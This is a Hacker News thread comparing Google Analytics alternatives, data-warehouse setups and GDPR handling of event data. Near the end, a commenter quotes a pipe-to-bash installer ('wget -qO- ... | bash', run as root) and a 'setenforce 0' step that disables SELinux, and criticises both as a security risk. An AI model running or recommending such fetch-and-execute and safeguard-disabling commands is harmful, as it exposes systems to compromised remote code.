Hacker News new | comments | ask | show | jobs | submit login
Migrating from Google Analytics (thomashunter.name)
352 points by gorkemcetin 14 days ago | hide | past | web | favorite | 104 comments

If you are thinking of migrating away from GA, I highly recommend you move to a data warehouse based solution, where you store each event permanently in a data warehouse like Snowflake or BigQuery. There are two client side pixels that you can self-host: snowplow.js and segment. It’s hard to find instructions for self hosting segment but I’ve made an example at https://github.com/fivetran/self-hosted-analytics-js

The advantage of doing it this way is you preserve the event level data forever and you can write arbitrary SQL against it. You will need a BI tool to visualize; there are several excellent ones with free or cheap tiers for small companies.

That's the path many data-driven companies take lately. Most companies start with plug-and-play solutions such as GA or Mixpanel but as they start to dig into their customer data, they either hire data engineers or use ETL solutions to collect their raw event data into a data warehouse and BI tools in order to track their own metrics.

That way, you will have more control and be able to ask any question you want. We have been working on a tool that basically connects to your Segment or Snowplow data and run ad-hoc analysis similar to Mixpanel and GA so that you don't need to adopt generic BI tools and write SQL every time you create a new report. I was going to create a Show HN post but since your comment is quite relevant to the topic, I wanted to share the product analytics tools that we have been working on, https://rakam.io. The announcement blog post is also here: https://blog.rakam.io/update-we-built-rakam-ui-from-scratch-...

P.S: I also genuinely appreciate the work the people have done at Countly, it's often not easy to use ETL tools to set up your own data pipeline and create your own metrics yourself so they're a great alternative if you don't want to get stuck with GA or third-party SaaS alternatives.

Really wish your landing page had screenshots.

Thanks for the suggestion Thomas. We're rebuilding the landing page at the moment and we will be updating it next week. In the meantime, here is a getting started video: https://www.youtube.com/watch?v=G8Cm5jzYUPw&t=1s

We’re thinking of storing data into Elastic - any thoughts on that approach, or recommendations on how / what to do?

Elastic is great when it comes to storing the log data but since it's not ANSI SQL compliant, it's hard to run complex queries that involve JOINs, WINDOW operations, and subqueries.

Depending on the data volume, you can use one the SQL based data warehouse solutions such as Redshift, Presto, BigQuery or Snowflake (even PG works if you have less than 100M events per month) and run ad-hoc queries on your raw customer event data easily. It's a bit tricky to run behavioral analytics queries such as funnel and retention but we provide non-technical friendly user interfaces that don't require you to write any SQL.

I would love to talk about your use-case, feel free to shoot an email to emre {at} rakam.io

I do both: use ELK for deep dive on analytics and have a traditional data warehouse for SQL.

Elastic is really good for data exploration. Kibana's discovery page makes it trivial to start diving into your events and gain insights. This is most valuable for large, complex applications where you don't necessarily control the analytics tagging (thus devs can create new tags willy-nilly). It's also easier for non-technical users to get into, since there don't need any sort of SQL experience to build reports.

Elastic is really bad at performing aggregations. You can do it, but they are incredibly memory-intensive, and using them puts the cluster at risk of failure due to out of memory exceptions. It doesn't take many concurrent users for this to be an issue.

Traditional data warehouses are still the best place to get counts though. Assuming your users can write SQL, they can get everything they would want and it will be reliable. Newer databases support JSON structures, so you can even host arbitrary-sized dynamic event data in them like you can with Elastic.

This also depends on why you are choosing this technology - is it part of your existing stack or do you have in-house experts in this tech?

While Lucene synax is very powerful, it is not SQL as pointed out by the OP. If you have a lot of spare developer time and people skilled in this, it will likely work well for a while (potentially a really long while).

Going with something like BigQuery or Redshift enables you to utilize other tech to supplement or accelerate skill sets, such as paying a SaaS for visualization/analysis tools (Looker, Mode, etc).

In particular, separation of storage and processing helps avoid costs when you are not using the data. With elastic, I believe you need the cluster whether you are using it or not. BigQuery will only charge you for compute you use and pennies for storage. Same thing for Athena/Redshift spectrum. Snowflake is similar, but I believe for enterprise contracts it a bit more complex with minimums and such.

Structuring data is another really important consideration - will you need to normalize and will you need to update labels/dimensions? That’s just the start.

> is it part of your existing stack or do you have in-house experts in this tech?

Nope and nope. That's definitely the scary / unknown part!

> If you have a lot of spare developer time and people skilled in this, it will likely work well for a while (potentially a really long while).

We don't have a lot of spare developer time and people. However, the Elastic docs make our fairly straightforward use case - dump lots of events in and filter them by date and about 4 different properties - seem not too daunting.

The way it's sold on the Elastic site these days seems like a very "batteries included" kind of approach - am I interpreting their marketing a little too positively? Are we kidding ourselves? Would love to hear more about your thoughts!

> Structuring data is another really important consideration - will you need to normalize and will you need to update labels/dimensions? That’s just the start.

We don't expect much.

Thanks for mentioning the other technologies, too! The way we're structuring it allows us to either use Elastic, SQL, or something else entirely, so thankfully we're fairly agnostic on the data store. If Elastic turns out to be a time sink, we'll have no hesitation trying something else out.

Just letting you know, your site breaks if a browser does not allow third-party scripts.

Pricing info is a little thin on the ground!

Remember that if you’re storing each event you need to anonymise user identifying data out of it for GDPR (assuming you have users who don’t consent), and you need to be able to remove (or at least anonymise) the data of consent is withdrawn.

With Google the TOS states that you’re not allowed to store personal information in the first place at least.

The best way to solve this is to have a normalized schema. You assign each user an ID, and then you sync all the identifying information to its own table. So you get a schema that looks like:

  events (id, user_id, ...)
  users (id, first_name, last_name, email, ...)
If a user requests to be deleted from your database, or if you have a policy of deleting users when the cancel their subscriptions, you can accomplish that by deleting one row.

This isn't going to make you GDPR compliant by itself but it's a start.

Are the events not enough to re-identify the user? Not having a name literally in the database doesn’t make it anonymous.

As long as events don't have name/email/ip/... there should be no problem as far as i understand it. The regulation targets only personal identifiable information.

PII is a concept is US law. The GDPR uses personal data, defined as:

"any information relating to an identified or identifiable natural person (‘data subject’); an identifiable natural person is one who can be identified, directly or indirectly, in particular by reference to an identifier such as a name, an identification number, location data, an online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of that natural person"

Pseudonymization (separating unique identifiers from the rest of the datapoints) can and should be used as a safeguard, but doesn't remove the need to protect the data, particularly if you keep a link between the two.

If you were a bookshop and your events log someone anonymous as buying a book on niche topics A, B and C, I reckon that could easily globally uniquely identify me as there aren't many people in the world interested in all three. Then you could also see me buying a book on embarrassing topic D and blackmail me with it. No personal identifying information, but it's not anonymous.

Finger-printing is not PII. And the people blackmailing you because you're interested in both finger painting and the orficial applications of pine cones would not be entirely sure it was you. If they had an email address, name, or IP address with a timestamp, then they could be quite certain it that it was you.

> Finger-printing is not PII

I didn’t say it was. The original conversation wasn’t about PII it was about anonymising. Fingerprints defeat anonymisation.

I reckon in practice with for example an Amazon sales log with names removed and my public Twitter feed you could de-anonymise me with a high degree of certainty.

No argument from me, there are things like IPs that are very hard to find every copy of and eliminate. Putting the users in their own table is just a simple best-practice that has a lot of benefits, so it’s a great first step.

I think GA did away with the restriction on PII last year or thereabouts.

No, it’s still there:

You will not and will not assist or permit any third party to, pass information to Google that Google could use or recognize as personally identifiable informatiom

Thanks for correcting my error. Now I wonder what I was thinking? I’m sure there was some change in the policy, I’ll do some research.

On BI solutions, we’ve been using Metabase[1] a lot at work and it’s been fantastic.

[1] https://Metabase.com

Same - we’re getting some great insights from Metabase.

100% recommend the BigQuery and Segment combo. It’s so easy to setup and querying is just SQL. Few annoying issues though: Metabase is brilliant, but doesn’t support big query datasets properly so isn’t really able to be used. We’re in the process of switching to Tableau for our BQ queries, which allows powerful joins across all sorts of different data sets

I had a similar issue and switched to https://holistics.io. Working great so far.

I was thinking of using elastic search and Kibana, mostly because I know the stack already. Do you think i should rather look into BigQuery and Segment?

I'm not an expert, but I looked at both BQ and ELK and went with BQ just for ease of ops and the fact we can use SQL, which makes it more accessible to other team members who know SQL.

We're a small startup though, so last thing I wanted was even the slightest ops load from a new system.

We've actually been trying to figure out the best path for this. We have most of our data in Periscope (we're on the Redshift version of it) and we also use GA and it would be great to be able to have everything in one place.

Seems like using Segment here is probably the least effort solution for future events, although it doesn't address ETLing past GA data into the warehouse. Curious if anybody else has had to deal with a similar situation.

We made that exact transition, and the limitation you describe is real - you can’t get anything out of GA, particularly at the granularity you’ll have with an alternative.

So it’s best to start early, because it’s a slow process.

It’s even slower if you don’t instrument the right events in the beginning, because you’ll wait a while to gather enough event data to perform an analysis, find you want to track some new event, and then need to wait even longer to have enough data for analysis. It can be frustrating, and a surprising amount of work.

If you want to build out your BI infrastructure in the mean time, you could always ETL your e.g. server logs into the data warehouse as a stopgap. It’s definitely not the same as the customer-centric setup that you get with Segment, though, unless you have some advanced logging already set up.

Are you a paid GA user? If that's the case, you can ingest your data into BigQuery. Otherwise; you can't export the raw data, the only option is to export the summary data (number of unique users per hour, day, week etc.) from GA to your Redshift cluster via an ETL tool such as Segment.

We are not a paid user. I believe that's around 200k a year? That's a good point, I haven't looked into paid vs unpaid functionality when it comes to data export yet.

I run data science in a company that publishes email newsletters. We store every delivery and event record as a row in our database. This gives us so much flexibility.

> there are several excellent [BI tools] with free or cheap tiers

Would live a recommendation or 2.

I've used Redash [1] and Saiku [2] with good success. Redash is a swiss army knife approach to dashboarding and can run/schedule queries against a plethora of data sources and visualise in different ways

Saiku uses Mondrian (OLAP) tech to give a slice/dice drill down view of data. Unfortunately the docs for Saiku seem very disjointed these days - there's a docker image for the CE (Community Edition) that I recently setup okay. Quite a learning curve on setting up Mondrian schemas here, though, but worth it when it's done.

[1] https://redash.io [2] https://www.meteorite.bi/products/saiku

Meta base is OSS and can run on heroku. tableau isn’t too badly priced for one license. But that’s about it - I’ve done a lot of research recently

Nice post! I have been thinking much about this for my own written works...

My strange conclusion was to not capture analytics at all. My loose metric is now: which posts inspire people to email me directly?

I have decided I do not want to know what you read, how long you read it, where you came from... Only whether or not you felt something. And data will not tell me this.

Interesting! I was reading all the comments, wondering if anyone would express the concept that maybe, just maybe, all of this might not be that useful after all.

More specifically, how often does all of this really need to be down to the individual person (or IP address) at all? Even if you know that piece of information at an ephemeral level, my own suspicion is that aggregate data should be sufficient for any non-creepy use case.

Perhaps one way to phrase the question, how would having personal-level details in the analytics change the actions you might perform based on available data?

I think it's great we are moving away from big data collectors and running our own servers. What I usually see is people storing their users' data on servers that are situated in locations where governments can get access to the data on the servers without the owner knowing about it. It's maybe going far in protecting the privacy of your users, but it's something a lot of solutions on the internet don't think about.

That's why I moved Simple Analytics' (https://simpleanalytics.io) servers to Iceland where the law will forbid peeking in data before actually informing the owner of the server. I encrypted my server so if anything happens I can just turn it off and it will be nearly impossible to get any user data.

I encrypted my server

Could you please share which Iceland host you are using? Also, what is the process you're following to encrypt your server?

I'm using 1984 [1]. I'm writing a blog post on this soon [2], but in short I use Ubuntu Server LVM [3], unlock my system via Dropbear SSH (a very small SSH client)[4] and did move the entry point of incoming data to another server which will store the incoming data only when the main server is down. This is because I want to keep recording incoming data and my encrypted server can't boot without me entering a password. So in case of a power failure the data of my customers will still be recorded.

[1] https://1984.is

[2] https://blog.simpleanalytics.io

[3] https://en.wikipedia.org/wiki/Logical_Volume_Manager_%28Linu...

[4] https://matt.ucc.asn.au/dropbear/dropbear.html

Good to see new tooling on analytics. Another alternative is Matomo (Piwik, formerly) https://github.com/matomo-org/matomo

Maybe not very new, as Countly is around for 7 years :-)

But no one has ever heard of it Recommend it around popular Internet forum. ( Although there are various submission but never gained any traction )

One reason could be Countly doesn't offer transparent pricing. People tends to switch off when they see call for quote.

More than 15000 mobile apps are already using it, Gartner recommends it - but you are right - more traction is always better. Re transparent pricing, it is a complicated process when you sell an enterprise product with many addons, support options, configurations etc, that is why on-prem customizable solutions don't usually have price tags.

Good stuff, using Matomo for my sites too. Haven't heard about Countly so that was interesting to learn too!

> Which pages were featured and on which social media platforms?

This was the “killer feature” of the Google Analytics replacement I built for myself a few years back. I would grab referrers for social and scrape them to give a more useful report of the source of traffic.

Unfortunately this is challenging or impossible for many social platforms due to HTTPS everywhere, the prevalence of outbound link scrubbing, and app-driven embedded web views.

I still think it would be a killer feature to know who tweeted you out or which subreddit you are trending on but it’s just not feasible to do based on a website pixel alone.

How does https stop this? I understand many websites will redirect before loading a link to clear the referrer data which is a good thing since the referrer header has been abused far too much.

I imagine originally its intent was for website owners to see what other websites linked to them but now it gets used to track the users

I always like to hear about new (to me) analytics options. Currently I use GA + Clicky, and I've considered getting rid of GA for a while. One option that looks attractive is Fathom, which can be used either as a SaaS or self-hosted, and is more focused on privacy than most.

Clicky: https://clicky.com

Fathom: https://usefathom.com/

I have always wondered, it is either something is doggy about Clicky, or others are really expensive. Clickly could do a million page view for $20/month, while others, even the simple ones that aren't as feature rich such as Fathom, offer anywhere from $29 / $50, to Matomo which is over $250 per month.

What's the Catch?

Check if your analytics vendor can do drilling and segmentation, and be able to dig into raw data. If that is possible (+which is a hard thing to implement), then costs are way higher.

I've just rewritten my 2-year-old https://trackingco.de/.

Enterprise-grade email analytics: https://mailspice.com

I have the same concerns with Google Analytics and tried to install Matomo [1] for my personal website [2] few months ago, seems a more robust tool than Countly [3] to me, maybe I'm wrong.

But I had an error installing Matomo and got not help in the official forum [4], if someone here can help me I will appreciate it, I'm not a developer (I'm also considering get rid of analytics tools for good, anyone?). Thanks.

[1] https://matomo.org/

[2] https://count.ly/

[3] https://pablomassa.com/

[4] https://forum.matomo.org/t/fatal-error-on-installation/29949

From [4] I learn:

"I have a Hostgator shared hosting with PHP 5.5."

PHP 5.5 is EOL since mid of 2017. Can't you switch to newer version such as 7.2?

Matomo itself does not even display the required version according to [1]. Their FAQ talks about 5.3 - which is horribly ancient too.

[1] https://matomo.org/docs/installation/


I have to agree that one should be using PHP 7.2. It also gives a nice performance boost to Matomo. The required PHP version for Matomo is shown in [1] (5.5.9 or greater) Can you please send me a link to the FAQ page mentioning 5.3 (e.g. to lukas@matomo.org) so they can be updated?

[1] https://matomo.org/docs/requirements/

My mistake, I was skimming the docs only but overlooked the specially linked requirements. I would go further though and remove outdated PHP versions from that page and only recommend maintained versions.

Additionally, the error described by OP looks like autoloading is broken.

Thanks! I find how to upgrade to 7.2 [1]. Will try it again!

[1] https://support.hostgator.com/articles/php-configuration-plu...

This project used to be called Piwik. 10 years later and they still only support MySQL; a lot of people really wanted at least Postgres support.

I've been playing with Matomo recently and opted to use a premade container [1] for it and that was working pretty well.

[1] https://github.com/crazy-max/docker-matomo

Anyone else miss Urchin? Google bought them and used it to build Analytics. For me at least, Urchin was vastly superior. I feel like Analytics is built for sites that run Google Ads to sell more ads. Urchin was for people who ran websites who wanted to learn more about their site and readers.

I loved the hosted version of Urchin that processed web server logs locally (or would grab them remotely with ssh/sftp/ftp). A shame that product was deprecated post-acquisition.

My favorite analytics tool was Mint from Shaun Inman.

I always reminisce about it when I see that urchin.js snippet..

It was *superior. Often times when people ran into a wall within GA they would flock to Urchin and its fairly reasonable price.


> What posts are popular this week?

> How is the site doing compared to last week?

If this is really all the information you need, try out a server-side solution like GoAccess [0]. It is a little bit harder to set up than copy&pasting an HTML snippet, but it is well worth it (privacy, performance, etc).

[0] https://goaccess.io/

The challenge with any server-side solution is the huge amount of caching that takes place within the web infrastructure. Many sites sit behind CDNs, but even without CDNs, many ISPs and enterprises run their own caching proxy servers on the edge of their networks. Browsers also have their own caching of recent pages. The result of all the caching is that it is possible that very few of the visitors actually connect to the origin server.

For that reason, most analytics systems use come kind of client-side tracking code that runs within the client web browser. That way it works regardless of whatever caching happens.

Server-side analytics is not a silver bullet, but it's great for the quoted use case. While it has the mentioned disadvantages, so do client-side solutions. Many people run adblockers and it's easy - sometimes even a default - to simply block Google Analytics & co. So yes, if you really need exact statistics, you should probably run both client-side and server-side analytics. But for a rough "what's popular?" estimate, there's no need to impose (one more) JS file on your users. I've switched from GA to GoAccess a few years ago (running both for a few months), and while the absolute numbers were off by ~10%, the ratio was almost the same. But then again, I'm just running a blog and not a business.

That's a great migration for the open-source community. As Thomas mentioned on his post, Google is a cornerstone of "centralized internet" and we should make this kind of migrations to stop them. #2pac

I'm curious how these alternative options (countly, matomo, snowplow, etc) handle fake referral traffic compared to how Google analytics handles it.

Has Google Analytics finally begun blocking referrer spam? I know Piwik/Matomo have been doing this by default for a while: https://matomo.org/blog/2015/05/stopping-referrer-spam/

The blacklist is on GitHub and is useful for other analytics software, such as GoAccess which is what I use.

Not well! Your best bet is to

  * Sync your (snowplow, segment, ...) data to a data warehouse
  * Try to clean up your data with SQL
  * Keep running GA so you can compare your numbers to GA

That's exactly what we do. Snowplow does a good job, but having the comparison points in GA is very helpful.

That may be a helpful open source machine learning project for a self-hosted analytics system perhaps.

Matomo uses a simple community-contributed list [1] of domains that were reported by multiple people to create referrer-spam.

Of course you can use the same list for every other software.

[1] https://github.com/matomo-org/referrer-spam-blacklist/blob/m...

Is there a privacy friendly analytics tool that does not set cookies and store data Forever? I don't really care about perfect user analytics, just good enough. Maybe by analysing logs. In the 90's there was s lot of good tools like this, but now everybody has gone cloud. I can't imagine the tools offered today are compatible with GDPR.


You can configure Matomo [1] to both not use any cookies [2] and to automatically delete just the raw data or all data that is older than x months. Log Analytics is also possible.

If you want something that is far more minimalistic, but also Open Source and self-hostable, you can take a look at [3]. (Not sure about how they use cookies)

(Disclaimer: I am part of the Matomo team)

[1] https://matomo.org/ [2] https://matomo.org/faq/general/faq_157/ [3] https://usefathom.com/

Countly (if you want) can be configured so it doesn't set cookies [1]

You can also configure to remove any data older than N days/months.

It is also GDPR compliant [2]

[1] https://resources.count.ly/docs/countly-sdk-for-web#section-...

[2] https://resources.count.ly/docs/compliance-hub

https://GoAccess.io is great for analysing access logs.

That said, there are solutions where a cookie allows for greater privacy because it allows you to leave sensitive data on the client versus having to store it on the server. For example, https://usefathom.com/ is an open-source self-hosted analytics tool that uses a cookie to enhance privacy.

I work on https://getmirrorshades.com It doesn’t use cookies. Data is aggregated immediately and purged on a tight schedule. May be worth seeing if it is sufficient for your use case.

Lately I've been pondering whether client-side analytic scripts generate truncated data by design? That is, a payload goes to the client but before a response can be sent to some backend server the client terminates (one example being a tab close) before the analytic code finishes. If this is the case my understanding is that it'd result in an unknowable underestimation of http responses. I'm still exploring the space and would be interested to know if others had thought about this?

There is a browser API called Beacon whose purpose is to address this specific edge-case. Google Analytics supports it as an option.


Most analytics providers have JS SDKs that persist the data to localStorage. When the user comes back to the webpage, the SDK tries to send the persisted data to the server. It's not an ultimate solution but it usually covers most of the cases where Beacon support is not available.

A small point (although I don't claim it militates against the central impulse of the article), is that serving analytics.js through gtag.js is obviously going to inflate the tag size unnecessarily. The latter is a unified interface for all of Google's various page snippets. Also, though not recommended, there's no reason you can't self-host GA, although practically speaking Google-hosted GA is likelier cached more often and on pretty snappy geolocated servers.

Is anyone using Yandex.metrica? It seems to offer a lot of features and is even completely free. But nobody seems to be talking about it. Where is the catch?

Considering GA is blocked by every adblocker I wouldn't rely too much on it anyway.

Hmm. Most viewed pages, time spent... okay.

But GA provide segments that marketers need. How do you get that kind of data without google of the fa pixel ?

Any interest in helping me build a countly alternative?

I think there is but what would you make different?

Not have a 1 liner installation script that's a security nightmare? :)

eg, this is the Countly one (specifically run as root):

  wget -qO- http://c.ly/install | bash
If someone manages to break into the c.ly redirection service, or the website/CDN/etc serving that, new users would likely be in for a bad time. And the problem could be very subtle, if it's done by someone clueful.

Just for added er.. goodness (/s), the Countly instructions also need people to:

  Disable SELinux on Red Hat or CentOS if it's enabled.
  Countly may not work on a server where SELinux is enabled. 
  In order to disable SELinux, run "setenforce 0".

Waiting For new tools..will see how accurate they work compared to google analytics.

A good one..!! Everything has some advantages and some disadvantages.

Is there any cookieless analytics solution?

Matomo can be set up for cookie less tracking. It will of course impact some metrics. More here: https://matomo.org/faq/general/faq_157/

You can disable Cookies in Matomo.


Yes, most of the analytics platforms out there can work without a cookie, including Countly.

Only advantage is that it weight less?

I don't feel convinced to switch :(

The advantage is that you're not selling out your user's browsing habits to the biggest surveillance company in the world.

That your pages are now lighter too is just a bonus.

Why countly and not piwik?

Yea, it's crippleware. Anything good is payfor

What is crippleware? GA?


Google definitely takes money for GA for large sites

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact